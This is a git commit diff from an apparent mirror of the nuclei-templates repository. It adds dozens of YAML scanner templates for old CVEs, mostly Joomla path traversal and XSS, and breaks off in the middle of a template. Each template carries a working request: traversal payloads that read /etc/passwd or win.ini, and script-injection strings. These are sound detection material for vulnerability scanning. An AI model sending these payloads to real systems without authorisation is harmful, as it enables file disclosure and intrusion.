daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' into dynamic_attributes

patch-1
forgedhallpass 2021-08-19 16:23:26 +03:00
parent ffaff64565 a2dc11fc29
commit 7b29be739e
266 changed files with 7370 additions and 1775 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
.github/workflows/templates-stats.yml vendored
View File

@ -9,6 +9,7 @@ on:
jobs: jobs:
build: build:
runs-on: ubuntu-latest runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates' && github.ref == 'refs/heads/master'
steps: steps:
- name: Checkout Repo - name: Checkout Repo
uses: actions/checkout@master uses: actions/checkout@master
@ -24,7 +25,7 @@ jobs:
env: env:
GO111MODULE: on GO111MODULE: on
run: | run: |
go get -v github.com/projectdiscovery/templates-stats go get -v github.com/projectdiscovery/templates-stats@main
shell: bash shell: bash
- name: Markdown Stats - name: Markdown Stats

3
.gitignore vendored
View File

@ -1,2 +1,5 @@
.idea/
.DS_Store .DS_Store
local/ local/
.checksum
.new-additions

1
CONTRIBUTING.md
View File

@ -97,3 +97,4 @@ You can refer to the following articles of Git and GitHub basics. In case you ar
- **Nuclei** outcomes are only as excellent as **template matchers💡** - **Nuclei** outcomes are only as excellent as **template matchers💡**
- Declare at least two matchers to reduce false positive - Declare at least two matchers to reduce false positive
- Avoid matching words reflected in the URL to reduce false positive - Avoid matching words reflected in the URL to reduce false positive
- Avoid short word that could be encountered anywhere

22
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 | | cve | 590 | dhiyaneshdk | 239 | cves | 597 | info | 583 | http | 1720 |
| panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 | | panel | 219 | pikpikcu | 237 | vulnerabilities | 265 | high | 465 | file | 46 |
| xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 | | xss | 215 | pdteam | 194 | exposed-panels | 221 | medium | 387 | network | 35 |
| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 | | wordpress | 201 | daffainfo | 136 | exposures | 174 | critical | 226 | dns | 11 |
| exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | | | exposure | 196 | dwisiswant0 | 128 | technologies | 159 | low | 156 | | |
| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | | | rce | 187 | geeknik | 127 | misconfiguration | 124 | | | | |
| cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | | | lfi | 176 | gy741 | 68 | takeovers | 70 | | | | |
| lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | | | cve2020 | 155 | madrobot | 60 | default-logins | 51 | | | | |
| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | | | wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | |
| config | 90 | gaurang | 42 | workflows | 34 | | | | | | tech | 101 | gaurang | 42 | workflows | 35 | | | | |
**138 directories, 1709 files**. **144 directories, 1870 files**.
</td> </td>
</tr> </tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

1349
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

20
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 | | cve | 590 | dhiyaneshdk | 239 | cves | 597 | info | 583 | http | 1720 |
| panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 | | panel | 219 | pikpikcu | 237 | vulnerabilities | 265 | high | 465 | file | 46 |
| xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 | | xss | 215 | pdteam | 194 | exposed-panels | 221 | medium | 387 | network | 35 |
| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 | | wordpress | 201 | daffainfo | 136 | exposures | 174 | critical | 226 | dns | 11 |
| exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | | | exposure | 196 | dwisiswant0 | 128 | technologies | 159 | low | 156 | | |
| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | | | rce | 187 | geeknik | 127 | misconfiguration | 124 | | | | |
| cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | | | lfi | 176 | gy741 | 68 | takeovers | 70 | | | | |
| lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | | | cve2020 | 155 | madrobot | 60 | default-logins | 51 | | | | |
| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | | | wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | |
| config | 90 | gaurang | 42 | workflows | 34 | | | | | | tech | 101 | gaurang | 42 | workflows | 35 | | | | |

26
cves/2005/CVE-2005-4385.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2005-4385
info:
name: Cofax <= 2.0RC3 XSS
description: Cross-site scripting vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
reference:
- http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html
- https://nvd.nist.gov/vuln/detail/CVE-2005-4385
author: geeknik
severity: medium
tags: cofax,xss,cve,cve2005
requests:
- method: GET
path:
- "{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "'>\"</script><script>alert(document.domain)</script>"

30
cves/2006/CVE-2006-1681.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2006-1681
info:
name: Cherokee HTTPD <=0.5 XSS
description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
reference:
- https://www.securityfocus.com/bid/17408
- https://nvd.nist.gov/vuln/detail/CVE-2006-1681
author: geeknik
severity: medium
tags: cherokee,httpd,xss,cve,cve2006
requests:
- method: GET
path:
- "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html

27
cves/2008/CVE-2008-4668.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2008-4668
info:
name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/6618
- https://www.cvedetails.com/cve/CVE-2008-4668
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2008/CVE-2008-4764.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2008-4764
info:
name: Joomla! Component com_extplorer 2.0.0 RC2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
reference: |
- https://www.exploit-db.com/exploits/5435
- https://www.cvedetails.com/cve/CVE-2008-4764
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2008/CVE-2008-6172.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2008-6172
info:
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
reference: |
- https://www.exploit-db.com/exploits/6817
- https://www.cvedetails.com/cve/CVE-2008-6172
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2008/CVE-2008-6668.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2008-6668
info:
name: nweb2fax <= 0.2.7 Directory Traversal
description: Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via .. in the id parameter to comm.php and var_filename parameter to viewrq.php.
reference:
- https://www.exploit-db.com/exploits/5856
- https://nvd.nist.gov/vuln/detail/CVE-2008-6668
author: geeknik
severity: high
tags: nweb2fax,lfi,cve,cve2008
requests:
- method: GET
path:
- "{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd"
- "{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
part: body
regex:
- "root:.*:0:0:"

27
cves/2009/CVE-2009-5114.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-5114
info:
name: WebGlimpse 2.18.7 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
reference: |
- https://www.exploit-db.com/exploits/36994
- https://www.cvedetails.com/cve/CVE-2009-5114
tags: cve,cve2009,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-0943.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0943
info:
name: Joomla! Component com_jashowcase - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
reference: |
- https://www.exploit-db.com/exploits/11090
- https://www.cvedetails.com/cve/CVE-2010-0943
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-0944.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0944
info:
name: Joomla! Component com_jcollection - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/11088
- https://www.cvedetails.com/cve/CVE-2010-0944
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1353.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1353
info:
name: Joomla! Component LoginBox - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12068
- https://www.cvedetails.com/cve/CVE-2010-1353
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1474.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1474
info:
name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12182
- https://www.cvedetails.com/cve/CVE-2010-1474
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1495.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1495
info:
name: Joomla! Component Matamko 1.01 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12286
- https://www.cvedetails.com/cve/CVE-2010-1495
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1602.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1602
info:
name: Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12283
- https://www.cvedetails.com/cve/CVE-2010-1602
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1657.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1657
info:
name: Joomla! Component SmartSite 1.0.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12428
- https://www.cvedetails.com/cve/CVE-2010-1657
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1722.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1722
info:
name: Joomla! Component Online Market 2.x - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12177
- https://www.cvedetails.com/cve/CVE-2010-1722
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1875.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1875
info:
name: Joomla! Component Property - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/11851
- https://www.cvedetails.com/cve/CVE-2010-1875
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1953.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1953
info:
name: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12288
- https://www.cvedetails.com/cve/CVE-2010-1953
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1955.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1955
info:
name: Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12238
- https://www.cvedetails.com/cve/CVE-2010-1955
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1979.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1979
info:
name: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12088
- https://www.cvedetails.com/cve/CVE-2010-1979
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1983.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1983
info:
name: Joomla! Component redTWITTER 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php
reference: |
- https://www.exploit-db.com/exploits/12055
- https://www.cvedetails.com/cve/CVE-2010-1983
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-2033.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2033
info:
name: Joomla Percha Categories Tree 0.6 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html
- https://www.cvedetails.com/cve/CVE-2010-2033
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-2259.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2259
info:
name: Joomla! Component com_bfsurvey - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/10946
- https://www.cvedetails.com/cve/CVE-2010-2259
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-2682.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2682
info:
name: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/14017
- https://www.cvedetails.com/cve/CVE-2010-2682
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-4617.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-4617
info:
name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/15791
- https://www.cvedetails.com/cve/CVE-2010-4617
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

29
cves/2010/CVE-2010-5278.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2010-5278
info:
name: MODx manager - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.
reference: |
- https://www.exploit-db.com/exploits/34788
- https://www.cvedetails.com/cve/CVE-2010-5278
tags: cve,cve2010,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
part: body

33
cves/2011/CVE-2011-4336.yaml Normal file
View File

@ -0,0 +1,33 @@
id: CVE-2011-4336
info:
name: Tiki Wiki CMS Groupware 7.0 has XSS
author: pikpikcu
severity: medium
description: Tiki Wiki CMS Groupware 7.0 has XSS via the GET "ajax" parameter to snarf_ajax.php.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2011-4336
- https://www.securityfocus.com/bid/48806/info
- https://seclists.org/bugtraq/2011/Nov/140
tags: cve,cve2011,xss,tikiwiki
requests:
- method: GET
path:
- "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html

27
cves/2011/CVE-2011-4804.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2011-4804
info:
name: Joomla! Component com_kp - 'Controller' Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/36598
- https://www.cvedetails.com/cve/CVE-2011-4804
tags: cve,cve2011,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2012/CVE-2012-0991.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2012-0991
info:
name: OpenEMR 4.1 - Local File Inclusion
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.
reference: |
- https://www.exploit-db.com/exploits/36650
- https://www.cvedetails.com/cve/CVE-2012-0991
tags: cve,cve2012,lfi,openemr
requests:
- method: GET
path:
- "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2012/CVE-2012-4253.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2012-4253
info:
name: MySQLDumper 1.24.4 - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.
reference: |
- https://www.exploit-db.com/exploits/37129
- https://www.cvedetails.com/cve/CVE-2012-4253
tags: cve,cve2012,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

28
cves/2013/CVE-2013-5979.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2013-5979
info:
name: Xibo 1.2.2/1.4.1 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/26955
- https://www.cvedetails.com/cve/CVE-2013-5979
- https://bugs.launchpad.net/xibo/+bug/1093967
tags: cve,cve2013,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

31
cves/2014/CVE-2014-4535.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2014-4535
info:
name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
- https://nvd.nist.gov/vuln/detail/CVE-2014-4535
tags: cve,cve2014,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/importlegacymedia/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "'></script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

31
cves/2014/CVE-2014-4536.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2014-4536
info:
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
tags: cve,cve2014,wordpress,wp-plugin,xss
requests:
- method: GET
path:
